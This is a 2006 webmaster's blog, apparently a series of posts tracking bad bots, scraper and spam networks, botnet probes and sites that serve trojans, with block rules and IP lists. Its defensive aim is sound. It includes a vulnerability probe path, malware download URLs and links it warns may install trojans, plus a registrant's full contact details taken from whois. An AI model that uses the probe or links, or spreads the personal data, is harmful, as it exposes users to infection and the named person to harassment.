72.36.205.106 "GET /blogpage7.html HTTP/1.0" "topicblogs/0.9"
Maybe you people over at TopicsBlog should implement robots.txt to see if we allow you to step off the RSS feed.

Until you fix it, you're just BLOCKED!

Botnet Attempts Photo Cart Vulnerability Attack

Today some mental midget wannabe hackers tried to hit my site using what appeared to be a bunch of compromised locations looking for a Photo Cart vulnerability that they naively attempted over 1,000 times.

Can you say bot blocker you lame hacking idiots?

Check your log files for this little gem

/PhotoCart/adminprint.php?path=
Check out this list of sites that launched the attack:
66.7.193.220 [interzone.shiftinteractive.net.] requested 70 pages as "libwww-perl/5.805"
72.29.76.238 [72-29-76-238.static.dimenoc.com.] requested 50 pages as "libwww-perl/5.805"
72.29.83.98 [jet33.hasweb.com.] requested 53 pages as "libwww-perl/5.805"
72.29.66.235 [bravo.dnshttp.com.] requested 31 pages as "libwww-perl/5.805"
72.36.156.123 [osd1.myhostcenter.com.] requested 1 pages as "libwww-perl/5.805"
204.11.234.28 [vn1133.fireboxhosting.com.] requested 79 pages as "libwww-perl/5.805"
64.8.118.5 [64-8-118-5.hsphereweb.com.] requested 115 pages as "libwww-perl/5.801"
72.3.249.214 [ashopsoftware.com.] requested 50 pages as "libwww-perl/5.65"
147.202.41.61 [x.xhort.com.] requested 29 pages as "libwww-perl/5.805"
208.101.29.107 [asprojectos.com.] requested 85 pages as "libwww-perl/5.805"
209.47.167.151 [server.web-marketing-concepts.com.] requested 32 pages as "libwww-perl/5.805"
67.19.74.138 [www2.comradelycertitude.com.] requested 110 pages as "libwww-perl/5.805"
64.8.118.4 [64-8-118-4.hsphereweb.com.] requested 90 pages as "libwww-perl/5.801"
66.159.142.166 [66-159-142-166.adsl.snet.net.] requested 1 pages as "libwww-perl/5.803"
81.181.15.6 [mail.cipnet.ro.] requested 60 pages as "libwww-perl/5.805"
67.19.224.66 [lamda.asmallorange.com.] requested 44 pages as "libwww-perl/5.805"
82.165.27.174 [p15173001.pureserver.info.] requested 36 pages as "libwww-perl/5.76"
200.32.10.19 [200-32-10-19.prima.net.ar.] requested 29 pages as "libwww-perl/5.805"
216.22.48.208 [216.22.48.208.servint.net.] requested 35 pages as "libwww-perl/5.805"
83.15.63.115 [eih115.internetdsl.tpnet.pl.] requested 5 pages as "libwww-perl/5.803"
209.172.35.53 [ip-209-172-35-53.reverse.privatedns.com.] requested 36 pages as "libwww-perl/5.79"
67.18.16.82 [srv24.icx.pl.] requested 1 pages as "libwww-perl/5.805"
163.178.79.2 [server.micit.go.cr.] requested 32 pages as "libwww-perl/5.803"
203.167.111.133 [133.111.167.203.assigned.static.eastern-tele.com.] requested 15 pages as "libwww-perl/5.79"
66.40.38.148 [host148.maxim.net.] requested 11 pages as "libwww-perl/5.65"
164.77.213.115 [unknown] requested 1 pages as "libwww-perl/5.805"
195.242.211.253 [faq.ecobike.de.] requested 2 pages as "libwww-perl/5.48"
158.66.1.12 [service2.mg.gov.pl.] requested 32 pages as "libwww-perl/5.65"
219.93.90.33 [unknown] requested 4 pages as "libwww-perl/5.65"
63.246.154.22 [ukrainehosting.info.] requested 6 pages as "libwww-perl/5.805"
71.198.177.113 [c-71-198-177-113.hsd1.ca.comcast.net.] requested 2 pages as "libwww-perl/5.805"
64.8.114.14 [web-06.ihservers.com.] requested 1 pages as "libwww-perl/5.801"
209.47.139.138 [server.privatelabelarticlesite.net.] requested 1 pages as "libwww-perl/5.805"
Some appear to obviously be compromised sites.

Oh boy, let the fun begin!

Friday, December 01, 2006

Webmaster Owns Spammers Ass

This is priceless as one of the phpBB spamming idiots from Russia messed with the wrong webmaster this time who now owns his spamming ass.

You just have to read this DRC forum post to believe anyone could be so stupid.

Thanks to SpamHuntress for pointing this out.

Wednesday, November 29, 2006

Dear Amazon AWS Group

To whom it may concern,

Your bot crawled my site today as shown below. Please notify your engineers, and I use the term loosely, that "Java/1.5.0_09" is not a valid bot name. Being that Amazon sells books on how to program Java, I'm sure you can find at least one book in your warehouse that will explain how to set the User Agent string when making web requests.

Additionally, would honoring ROBOTS.TXT be too much to request or do you feel justified not checking the robots file since your programmers can't figure out how to tell us what your bot name is in the first place?

216.182.236.241 [domU-12-31-34-00-00-B9.usma2.compute.amazonaws.com.] "Java/1.5.0_09"

216.182.236.142 [domU-12-31-34-00-01-1E.usma2.compute.amazonaws.com.] "Java/1.5.0_09"

216.182.236.177 [domU-12-31-34-00-00-F9.usma2.compute.amazonaws.com] "Java/1.5.0_09"

216.182.236.110 [domU-12-31-34-00-00-2A.usma2.compute.amazonaws.com] "Java/1.5.0_09"

216.182.236.167 [domU-12-31-34-00-01-07.usma2.compute.amazonaws.com] "Java/1.5.0_09"

216.182.233.105 [domU-12-31-34-00-01-D3.usma2.compute.amazonaws.com] "Java/1.5.0_09"

216.182.230.187 [domU-12-31-33-00-03-55.usma1.compute.amazonaws.com.] "Java/1.5.0_09"

216.182.237.9 [domU-12-31-34-00-01-B5.usma2.compute.amazonaws.com.] "Java/1.5.0_09"
It makes me weep for the future when a big web conglomerate, one that has a name that is synonymous with buying things online, one that should know better, starts to slide down that slippery slope of being a bad netizen.

Signed,
Get A. Clue

SiteAdvisor and ThePlanet Must Not Care

There were several hits my blog post about SiteAdvisor from Network Associates, that owns McAfee SiteAdvisor, yet nothing changed. Wouldn't you assume that after reading my posts about SiteAdvisor Green Lighting sites with the worms in them that someone would at least change the site status to protect people.

Nope.

Funny, Symantec's Norton AntiVirus agrees with me that the site has a worm, but SiteAdvisor says you're good to visit.



Maybe they don't think it's a threat because McAfee AV products don't detect this worm?

Who knows, I'll stick with Norton AV.

Then again, we have ThePlanet that hosts these sites, and they were notified 6 days ago that this problem existed on 4 of their servers and these sites are still online and functional.

I guess nobody cares about security these days.

Tuesday, November 28, 2006

BDFetch Plays By The Rules

Normally I'm always slamming corporate bots but when one company, like brandimensions appears to be playing by all the rules, I feel they should get a little praise.

Here's what their access attempts look like:

209.167.50.22 "GET /robots.txt HTTP/1.1" "www.brandimensions.com" "BDFetch"
209.167.50.22 GET /somepage.html HTTP/1.1" "www.brandimensions.com" "BDFetch"
209.167.50.22 "GET /robots.txt HTTP/1.1" "www.brandimensions.com" "BDFetch"
209.167.50.22 GET /somepage.html HTTP/1.1" "www.brandimensions.com" "BDFetch"
209.167.50.22 "GET /robots.txt HTTP/1.1" "www.brandimensions.com" "BDFetch"
209.167.50.22 GET /somepage.html HTTP/1.1" "www.brandimensions.com" "BDFetch"
At least they asked for robots.txt and appear to only go in when allowed.

However, they had a couple of bumps that I'd like to see them fix.

1. Ask for robots.txt once or twice a day, maybe once an hour worse case, not every access.

2. Set your reverse DNS to say bdfetch.brandimensions.com or something similar so we can verify it's really your company and not someone spoofing you.

3. Include a link to a page about your crawler in the user agent, and a version number, such as ""BDFetch/1.0 +http://www.brandimensions.com/crawler.html"

Other than those minor glitches, kudos for at least trying to play by the rules and at least giving webmasters the choice to allow you to crawl or not.

Nicely done.

Legality of Stealth Robots, Are They Trespassing?

What is the legality of a stealth robot, are they doing anything wrong?

Take a look at "Computer Hacking and Unauthorized Access Laws" and you'll see there's a quagmire of various laws but the topic that's most relevant to this discussion would be "Unauthorized access" which basically covers trespassing onto a computer, theoretically even if that service is a public web server as the laws don't specify the server or service has to be private.

I'm no lawyer, so this obviously isn't valid legal advice, just my musings over the content of the California law, particularly the definitions in 502.c:

(c) Except as provided in subdivision (h), any person who commits any of the following acts is guilty of a public offense:

(1) Knowingly accesses and without permission alters, damages, deletes, destroys, or otherwise uses any data, computer, computer system, or computer network in order to either (A) devise or execute any scheme or artifice to defraud, deceive, or extort, or (B) wrongfully control or obtain money, property, or data.

(3) Knowingly and without permission uses or causes to be used computer services.
Let's examine what these transparent stealth crawlers do and see if it fits the definition.

First, the people using stealth crawlers know if they use a real user agent like "Bob's Bot 1.0" that it will expose their presence and they will be blocked. To avoid this, they mask their presence which obviously falls under "knowingly accesses and without permission" to get to the content on the web site attempting to block their trespass.

Second, after they have gained access they "wrongfully control or obtain ..., property, or data" and do with it as they please, republish without permission, use to compile reports, etc., so I think we've covered two aspects here.

Even if the act itself causes relatively little harm, there is still a potential for penalty.
(3) Knowingly and without permission uses or causes to be used computer services.

(A) For the first violation which does not result in injury, and where the value of the computer services used does not exceed four hundred dollars ($400), by a fine not exceeding five thousand dollars ($5,000), or by imprisonment in the county jail not exceeding one year, or by both that fine and imprisonment.
The obvious solution for the crawler to be technically "legal" is to simply identify the bot by an obviously unique name like "Bob's Bot 1.0" and stop trying to spoof the web server as being Internet Explorer or Firefox in order to gain access.

I'd be curious what some legal minds might think about this interpretation of these laws for this particular application.

Sunday, November 26, 2006

Huge Made for AdSense Scraper and Spammer Operation Unveiled

The downside of scraping the wrong webmaster is that your websites now contain breadcrumbs that let that webmaster unravel a big chunk of your network of sites that you've been scraping and spamming.

I'm not going to even go into the list of domains I found my scrapings on as it's a huge list and the specific sites I found were all hosted on theplanet.com and 800hosting.net.

Besides, if I expose the list this MFA scraper spammer might figure out how I unraveled his system and we wouldn't want that, now would we?

I'm not even going to bother with the IP they were scraping from or the user agent since it was a spoofed browser UA of course, and the IPs doing the scraping were all from the same hosting companies listed below.

Instead, let's start at the top of the iceberg with their statistics pages listing 400-500 sites per page which in total roughly links to about 6,500 individual scraper sites, and I'm sure we're just touching the surface here.

http://www.badhood.info/
http://www.browserbytes.com/
http://www.csprovisions.com/
http://www.inbounders.com/
http://www.jewelrydns.info/
http://www.landingdns.info/
http://www.link-magic.com/
http://www.link-pros.com/
http://www.multithreedns.info/
http://www.multitwodns.info/
http://www.sfte.info/
http://www.terrificdns.com/
http://www.trafficsupply.com/
http://www.virtual-domains.com/
So where do these sites host?
badhood.info 70.87.137.2 -> 2.89.5746.static.theplanet.com

browserbytes.com 74.52.26.194 -> c2.1a.344a.static.theplanet.com

csprovisions.com 74.52.29.2 -> 2.1d.344a.static.theplanet.com

inbounders.com 66.98.156.98 -> evolution.cia.sk

jewelrydns.info 69.41.183.122 -> (800hosting.net)

landingdns.info 66.98.132.73 -> ev1s-66-98-132-73.ev1servers.net

link-magic.com 64.246.60.95 -> rs-64-246-60-95.ev1.net

link-pros.com 64.246.60.50 -> ns1.s810.net

multithreedns.info 74.52.225.194 -> c2.e1.344a.static.theplanet.com

multitwodns.info 74.52.126.130 -> 82.7e.344a.static.theplanet.com

sfte.info 70.87.216.194 -> c2.d8.5746.static.theplanet.com

terrificdns.com 66.98.132.68 -> damon.screaminghost.com

trafficsupply.com 66.98.250.34 -> (Everyones Internet)

virtual-domains.com 66.98.198.44 -> ev1s-66-98-198-44.ev1servers.net

There you go, it could've been a been long spew of data but there's really nothing you need to know except BLOCK access from data centers and you'll be a bit more secure, which I've been preaching for quite some time.

Now, let's look at a specific site like fashionmenclothingjackets.info and you'll see how they really spam the search engines with 3 digit subdomains. All of their sites are like this and there are literally hundreds of thouands, if not millions, of junk pages associated with this one group of domains.

And we'll take a peek at another of these sites, like fiftiesteenagefashion.info, to see how they promote themselves with blog and forum spam for traffic.

There you have it all with scraping, search engine spam and blog and forum spam all tied up in one neat little package.

Enjoy.

P.S. Did we piss on someone's cornflakes?

Getting a ton of hits to this post via a forum on http://www.pginsider.com/ which makes you go Hmmmm.... it's amazing how they out themselves once you post something.

Anti-Phish Shootout: Firefox 2 vs. MSIE 7

Another phishing email arrived today so I tried it in both Firefox 2 and MSIE 7 as fast as I could get the link pasted into the browsers.

The resulting screenshots below and the score is:

FIREFOX: 1
INTERNET EXPLORER: 0







Maybe Microsoft should hire some of the Firefox developers so they can show them how to do anti-phish properly.

Saturday, November 25, 2006

MSIE 7 and Firefox 2 Still Not Reasonably Secure

We heard all the security hype when MSIE 7 and Firefox 2 came out and it turns out it was tons of hype and hoopla that was completely meaningless. They'll stop us from being Phished but those Java trojan horse and worm vulnerabilities still exist and have a revolving door to get into your computer if you have Java enabled.

This issue was highlighted in a recent post about McAfee SiteAdvisor Green Lights Notorious Malicious Sites but I thought I'd post about this again just in case people missed the part at the bottom of that long post highlighting how all of these vulnerabilities existed long before either version shipped and they simply didn't fix them or give us reasonable controls to hinder the problem.

The simple solution to avoid things like the Win32/Agent.RX trojan is to disable Java altogether, not Javascript but Java itself. The problem is there are a lot of useful applets all over the net, especially the fun ones like games on Pogo.com, or Yahoo Games, so eventually we'll want to turn Java back on in the browser for those sites.

Now the hard question:

Just how hard would it be for the browsers to allow us to enable Java and Javascript per site?


This was a very blatant oversight of a well known vulnerability, yet it still exists in recently released products without any type of protection other than to completely disable Java. If that Java option per site exists I sure missed it as I snooped around the options before posting this. If it's there it's buried somewhere in the basement of options or I'm blind as nothing just hopped out about this issue other than to disable Java altogether.

Funny, they have silly options for privacy freaks to ask about cookies, or remembering passwords, and all sorts of other good things but when it comes to real security, WHAMMO! here comes the trojan without as much as a warning.

If you can warn about installing add-ons without first asking permission so how hard can this be, to simply ask first if we want to load Java?

That's a very strong statement from at least 2 browser providers that have made it very clear they don't give a shit if we get hacked or not if we have Java enabled. The technology to stop the browser from loading Java without asking permission is so simple that an apprentice programmer could implement it.

Had my virus scanner not been up-to-date, I'd have been screwed pure and simple.

Gee thanks browser makers, thanks for these major security updates.

More Bot Activity in Bezinqint

Had a chance to look for more possible Picscout crawling activity in another block of bezeqint.net IP's and found a rash of activity. Some was definitely bot activity, others had a fairly small sample and nothing was definitive except the crawl speed which can also be explained away by pre-fetch technology.

Here's a definitive bot in that range:

88.152.15.7 Mozilla/4.0 (compatible ; MSIE 6.0; Windows NT 5.1)
Just another garden variety scraper or is Picscout sharing IP's with bezinqint's other customers?

About 20 others set off alarms but nothing quite as aggressive as that one IP listed asking for about 50+ pages in increments of 5-10 seconds apart, and that was after they were being challenged so it's a bot to be sure.

Who the bot belongs to is the question.

I'm considering blocking this range considering the number of alarms that were set off.

inetnum: 88.152.170.0 - 88.152.255.255
netname: ADSL-CUSTOMER-CONNECTION
role: BEZEQINT NETWORKING TEAM
route: 88.152.176.0/20

Not that everyone should block the whole thing, but the one IP address referenced was definitely a problem child.

So much data, so little time...

McAfee SiteAdvisor Green Lights Notorious Malicious Sites

McAfee's SiteAdvisor is a great idea and I've been a big fan as it helps avoid many bad sites. However, they're obviously not catching certain things that some of the more clever malicious site owners are doing to avoid their detection. This has led to them green lighting one of the most malicious sites I've seen and this guy has a bunch of them just waiting for unsuspecting visitors.

In this instance, SiteAdvisor gave a completely false sense of security.


CAUTION: Some of the links below may try to inject a worm or trojan.


Here's the results for http://www.euc2005.com/ which claims it's perfectly safe which is blatantly wrong:



The info balloon claims they've scanned it and it's clean... WRONG!


Here's the site when you click to visit http://www.euc2005.com/:


I clicked the link "Czym jest GIS" which claims to be loading DIRECTIONS and up pops the bogus search page and my anti-virus goes off claiming that the site was atttempting to install a trojan from http://tisall.info/e/us02/e.cab. Additionally note the yellow warning bar at the top of MSIE 7 claiming the site was trying to install an add-on to the browser at the same time.


SiteAdvisor would do themselves a favor and just red flag anything that is related to Inhoster, where the trojan attempted to download from, as they appear to be a haven for spammers, scrapers and other malicious activity and numerous bad references can be found to their hosting all over the net.

Just for giggles I checked a few more bad domains I knew and SiteAdvisor hadn't checked any of them yet. However, this one below blew my mind because all of the URL's displayed in Yahoo were the actual CAB files themselves and SiteAdvisor didn't even warn me that clicking on a .cab file might be a bad idea.


Come on guys, this is a no brainer, if you actually find a listing in a search engine linking directly to the virus or worm file, or a suspicious file type such as a .cab or .exe, you should at least put up the yellow CAUTION symbol at a minimum.

IMO the real fault here isn't that McAfee SiteAdvisor missed these files, it's that the browser allows certain files to be executed randomly without asking. For the love of god, the browsers have options to ask per site if you want a stinking COOKIE which can do no immediate harm to your computer. Something as vulnerable as MSIE that can install trojans that just started downloading automatically, without warning or controls, and only when it looked like something was an add-on did I even get a warning from MSIE 7.

What's most amazing is both FireFox 2 and MSIE 7 are NEW RELEASES yet still vulnerable to some particularly nasty problems that has been around for ages and neither of them did anything to protect against this in their latest releases.

Is everyone at these browser companies asleep at the wheel?

Hopefully SiteAdvisor can figure out what they missed that allowed this rogue site to be green-listed and avoid these problems moving forward as it's obvious they're the only ones even trying to help as the browsers just left the problem remain in all their new versions.


P.S. The company hosting these sites, theplanet.com, has been notified about the problem and we'll all be watching to see if these domains continue to function.

Friday, November 24, 2006

Google Image Search Used for Copyright Abuse Mashup

Today I came across a bunch of slimy mashup sites that combine images from Google Image Search (your images) with affiliate ads. The attempt is to try to make it look like a legitimate directory or search engine for the topic but what's happening is your images are being used without permission and being attributed to other sites.

CAUTION: Some of the links below may try to inject a worm or trojan.

Go to one of the sites here:

http://www.euc2005.com/photography/Digital-photography.html
See those images?

The images are directly from Google Image Search for "Digital Photography":
http://images.google.com/images?hl=en&q=Digital+photography&btnG=Search+Images

Here's the URL to the images from that page:
http://images.google.com/images?q=tbn:RaA8sUkYvwGMCM:
http://www.saugus.net/Photos/images/pemigewasset_river.jpg

http://images.google.com/images?q=tbn:WHUZv_rlRPX82M:
http://www.jungleboffin.com/images/artoriginals/digitalpower/6.jpg

http://images.google.com/images?q=tbn:dXhig_gAZri
KQM:h
ttp://joecarr.ca/astro/images/2003/2003N707a.jpg

http://images.google.com/images?q=tbn:XoEoJdT29qBX8M:
http://www.kanaphoto.com/img/digital_7.jpg
Same crap going on from this Polish site too:
http://buy-xenical-us.qo.pl/
Note that the domain EUC2005.COM is a dummy domain, it's actually pulling up searches in a frame from this site:
http://f-mf.org/search.php?q=digital+photography

Just for giggles, I did a search for PHOTO.NET in their little search window to see what came up:



Here's the same search in Google Images:



This mess all seems to be hosted on theplanet.com, big shock, on at least 4 servers that I can find, click the IP below for a list of domains:
74.52.114.114
74.52.114.115
74.52.114.116
74.52.114.117
I found some of this same crap on every server, click some links from the home pages of these domains and you'll see the same old shit like this:
http://homepage-building.info/carl-bucherer/
or this:
http://kdcconstruction.net/morel/
or this:
http://internetuniversityincome.com/pantech/
etc.

Now let's see who appears to be behind this mess:
Domain ID:D128714698-LROR
Domain Name:F-MF.ORG
Created On:11-Sep-2006 11:05:33 UTC
Last Updated On:11-Nov-2006 03:50:00 UTC
Expiration Date:11-Sep-2007 11:05:33 UTC
Sponsoring Registrar:Direct Information PVT Ltd dba PublicDomainRegistry.com (R27-LROR)
Status:OK
Registrant ID:DI_2372832
Registrant Name:Soodkhet Kamchoom
Registrant Organization:N/A
Registrant Street1:2002 E. Tamarack Road
Registrant Street2:
Registrant Street3:
Registrant City:Altus
Registrant State/Province:Oklahoma
Registrant Postal Code:73521
Registrant Country:US
Registrant Phone:+001.5806436662
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:soodkhet@zlex.org
Name Server:NS1.F-MF.ORG
Name Server:NS2.F-MF.ORG
Someone else has our copyright infringing buddy listed in an MVPS HOSTS file for some bad things as well:
# [Soodkhet Kamchoom]
127.0.0.1 alllinx.info
127.0.0.1 dinet.info #[Trojan.Win32.Small.EV]
127.0.0.1 eqash.net #[eTrust.Win32/Secdrop.JU]
127.0.0.1 frdolls.net
127.0.0.1 frlynx.info
127.0.0.1 joutweb.net
127.0.0.1 linim.net #[eTrust.Win32/Secdrop.JU]
127.0.0.1 linxlive.net
127.0.0.1 lipdolls.net
127.0.0.1 nwframe.net #[Win32/Nitwiz.A]
127.0.0.1 zllin.info #[MHTMLRedir.Exploit][Win32/Dialer.KM]
Now let's see where the base of search operations F-MF.ORG resides:
host F-MF.ORG
F-MF.ORG has address 66.230.138.195

whois 66.230.138.195

OrgName: ISPrime, Inc.
OrgID: IPRM
Address: 25 Broadway
Address: 6th Floor, Suite #2
City: New York
StateProv: NY
PostalCode: 10004-1086
Country: US

NetRange: 66.230.128.0 - 66.230.191.255
CIDR: 66.230.128.0/18
I looked at the adjacent server IP 66.230.138.194 and BINGO! there's some of the domains listed (in bold) in the MVPS HOSTS files, amazing isn't it?
alllinx.info
cleanchain.net
drefus.org
eqash.net
frlynx.info
frsets.info
joutweb.net
linim.net
linxlive.net
nwframe.net
recdir.org
There's obviously more, but I'm bored chasing this idiot at this time, maybe later.

I've been advocating everyone block access from known datacenters and proxy servers for quite some time to stop scraping and other abuse so had the Googlers listened, and I know they heard me, this abuse wouldn't be happening right now and webmasters wouldn't have to deal with this level of abuse.

Sorry to say, I'm going to have to add this line to all my robots.txt for Google, Yahoo and MSN until they resolve this vulnerability:
Disallow: /images/
Why won't they listen when I explain what the vulnerabilities are?

Why must we the webmasters have to deal with this garbage?

Firing up the DMCA letters now, several search engines and ISPs are about to be served...

If your images show up on their pages, join me in fighting this good fight.

Wednesday, November 22, 2006

Exalead Preview Violating Webmasters Content

It's been ages since I've wandered over to Exalead and played with it for a while. I get a few spurious hits from their cute little search engine so I thought I'd explore for a bit and see what it had to offer.

Oh look, nice layout, thumbnails, click on the thumbnails and get a site preview...

Oh my god, they downloaded my page in real-time, stripped out my javascript so they could frame it without my frame buster working, and the page looks like shit now.

I'm speechless...

Not to mention infuriated that they would violate my content in such a manner.

If you want to just block the preview mode, they send a request like this:

193.47.80.78 "GET / HTTP/1.1" "http://www.exalead.com/search" "NG/4.0.2897.395"
So blocking "^NG/" in .htaccess should do it and add "NOARCHIVE" to all your pages just to make sure they don't pull up an old copy, as that would REALLY piss people off if they don't honor NOARCHIVE.

If you just want to block the bot, it's "Exabot/3.0".

If you just want to block them completely, they crawl from here:
inetnum: 193.47.80.0 - 193.47.80.255
netname: EXALEAD
route: 193.47.80.0/24
Just another reason why webmasters will keep hating some web sites and search engines because they just don't get it so fuck 'em, they can't play in my sandbox any more.

Tuesday, November 21, 2006

Bezeqint Hosts Scrapers, Spammers and more

The previous post about Hunting Picscout assumes that they are operating out of bezeqint.net which is where their website is hosted. The decision to block the first range of bezeqint.net from the previous post was easy because it appears to be a data center where residential customers wouldn't be blocked.

Then there is this other barrage of crap coming from what claims to be BEZEQINT-CABLES which may be residential but I can't read Hebrew so who knows. Anyone that can translate Bezeqint's site and give us more clues would be greatly appreciated.

This one particular IP tried to crawl about 300 pages:

84.110.241.167 "Mozilla/4.0 (compatible; MSIE 5.0; Windows NT 4.0)"
Garden variety scraper or part of Picscout?

Hard to say.

However, we have found a new rash of activity while researching bezeqint.net looking for PicScout but these were all in my spam trap, no referrers, all one shot attempts to post something that was blocked, mostly about Viagra.

The spammers all came from these blocks:
inetnum: 84.110.208.0 - 84.110.223.255
netname: BEZEQINT-CABLES

inetnum: 84.110.224.0 - 84.110.239.255
netname: BEZEQINT-CABLES

inetnum: 84.110.240.0 - 84.110.255.255
netname: BEZEQINT-CABLES
Here's the big list which makes me wonder if it's DHCP or a botnet?
84.110.208.4 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.211.29 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.217.105 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.217.116 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.217.192 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.220.146 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.220.90 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.224.132 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.224.15 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.224.15 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.224.152 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.225.61 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.225.84 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.225.95 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.226.179 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.226.248 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.226.93 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.226.94 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.227.133 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.227.175 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.228.115 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.228.126 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.229.104 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.229.189 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.229.240 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.229.250 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.229.73 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.231.107 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.231.12 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.231.134 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.231.154 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.231.200 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.231.52 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.231.99 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.232.216 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.232.239 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.232.5 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.233.177 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.233.193 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.233.207 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.233.229 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.233.245 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.233.252 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.233.39 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.234.113 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.235.110 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.236.103 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.236.112 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.236.116 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.236.157 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.236.8 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.236.93 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.237.49 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.237.93 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.238.117 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.238.221 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.238.37 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.239.139 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.239.69 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.240.110 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.240.242 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.240.39 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.240.42 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.241.132 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.241.149 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.241.163 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.241.187 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.241.45 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.241.98 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.242.118 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.242.141 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.242.86 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.242.88 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.243.107 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.243.125 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.243.17 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.243.86 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.244.148 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.244.185 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.244.201 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.244.240 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.244.254 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.244.4 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.245.122 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.245.124 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
